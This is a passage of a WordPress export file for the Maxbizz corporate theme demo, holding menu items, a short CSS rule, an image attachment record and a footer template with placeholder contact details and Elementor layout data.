		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1755</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1755]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>7</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[690]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1756/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:27 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1756/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1756</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:27]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:27]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1756]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>8</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[711]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>maxbizz</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/maxbizz-3/</link>
		<pubDate>Thu, 12 Nov 2020 08:06:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/12/maxbizz-3/</guid>
		<description></description>
		<content:encoded><![CDATA[@media (min-width: 1025px) {
	.team-form > span.wpcf7-form-control-wrap{
		margin-right: 10px;
	}
	.team-form input[type=text], .team-form input[type=email]{
		width: 377px;
		max-width: 377px;
	}
}
]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1958</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 08:06:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 08:06:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[maxbizz-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[custom_css]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>testi1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/about-us/testi1/</link>
		<pubDate>Thu, 31 Dec 2020 11:01:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2241</wp:post_id>
		<wp:post_date><![CDATA[2020-12-31 11:01:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-31 11:01:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>487</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/testi1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/12/testi1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_footer_builders/footer-1/</link>
		<pubDate>Fri, 24 Jul 2020 09:02:09 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_footer_builders&#038;p=300</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>about us</h6>		
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Linkedin-in
											</a>
			<h6>Head office</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>our location</h6>		
										<img width="328" height="199" src="https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/map-footer-home4.png 328w, https://maxbizz.s3.amazonaws.com/images/map-footer-home4-300x182.png 300w" sizes="(max-width: 328px) 100vw, 328px" />											
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					London
				</h6>
								<p>+5-800-456-478-23</p>
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Tokyo
				</h6>
								<p>+3-800-456-478-23</p>
		<p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>300</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 09:02:09]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 09:02:09]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f40b9b0","elType":"section","settings":{"structure":"20","background_background":"classic","background_color":"#061E2F","padding":{"unit":"px","top":"180","right":"0","bottom":"110","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"32bca0e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"bf3cf87","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"d186df0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fcb9632","elType":"widget","settings":{"title":"about us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8921794","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#AFC1CE","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"30d8f28","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#4B83FC","icon_secondary_color":"#FFFFFF","icon_primary_color":"#13364F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":true},{"id":"1eb9096","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"9f422e8","elType":"widget","settings":{"title":"Head office","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d17acaa","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"5b725a2","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"9ff98c2","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b6ef71d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"3b3bd0c","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20"},"elements":[{"id":"c82c7d2","elType":"column","settings":{"_column_size":50,"_inline_size":61,"_inline_size_tablet":50},"elements":[{"id":"e3ac00d","elType":"widget","settings":{"title":"our location","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Open Sans","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3160db4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/map-footer-home4.png","id":1966},"image_size":"full","align":"left","_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"eb5ea23","elType":"column","settings":{"_column_size":50,"_inline_size":39},"elements":[{"id":"ab76595","elType":"widget","settings":{"title_text":"London","description_text":"+5-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"2af4006","elType":"widget","settings":{"title_text":"Tokyo","description_text":"+3-800-456-478-23","position":"left","title_size":"h6","primary_color":"#55BB53","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"de9425d","elType":"section","settings":{"background_background":"classic","background_color":"#061E2F"},"elements":[{"id":"5c90953","elType":"column","settings":{"_column_size":100,"_inline_size":null,"border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"7456be1","elType":"section","settings":{"layout":"full_width","border_border":"solid","border_width":{"unit":"px","top":"1","right":"0","bottom":"0","left":"0","isLinked":false},"border_color":"rgba(255, 255, 255, 0.1)","padding":{"unit":"px","top":"25","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[{"id":"0bb002f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"23f3334","elType":"widget","settings":{"editor":"<p>Copyright \u00a9 2020 Maxbizz by OceanThemes. All Rights Reserved.<\/p>","align":"center","text_color":"#879DAD","typography_typography":"custom","typography_font_size":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:3;s:21:"typography_typography";i:3;s:22:"typography_font_family";i:3;s:20:"typography_font_size";i:3;s:22:"typography_font_weight";i:3;s:25:"typography_text_transform";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:11:"text-editor";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:2;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:2;s:21:"typography_typography";i:2;s:22:"typography_line_height";i:1;s:5:"align";i:1;s:20:"typography_font_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:2:{s:7:"content";a:1:{s:19:"section_social_icon";a:4:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;s:18:"icon_primary_color";i:1;}s:20:"section_social_hover";a:1:{s:19:"hover_primary_color";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:8;s:19:"_inline_size_tablet";i:5;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}s:5:"style";a:1:{s:14:"section_border";a:1:{s:12:"border_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:5;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:5;s:16:"description_text";i:5;s:8:"position";i:5;s:10:"title_size";i:5;s:13:"selected_icon";i:5;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:5;s:9:"icon_size";i:5;s:6:"rotate";i:5;s:10:"icon_space";i:5;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:5;s:27:"title_typography_typography";i:5;s:26:"title_typography_font_size";i:5;s:28:"title_typography_font_weight";i:5;s:33:"description_typography_typography";i:5;s:32:"description_typography_font_size";i:5;s:34:"description_typography_font_weight";i:5;s:11:"title_color";i:5;s:28:"title_typography_font_family";i:5;s:17:"description_color";i:5;s:34:"description_typography_font_family";i:5;s:17:"text_align_mobile";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:3;s:14:"_margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:3;s:3:"gap";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:3;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:2;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_mobile";i:1;}}}}}]]></wp:meta_value>
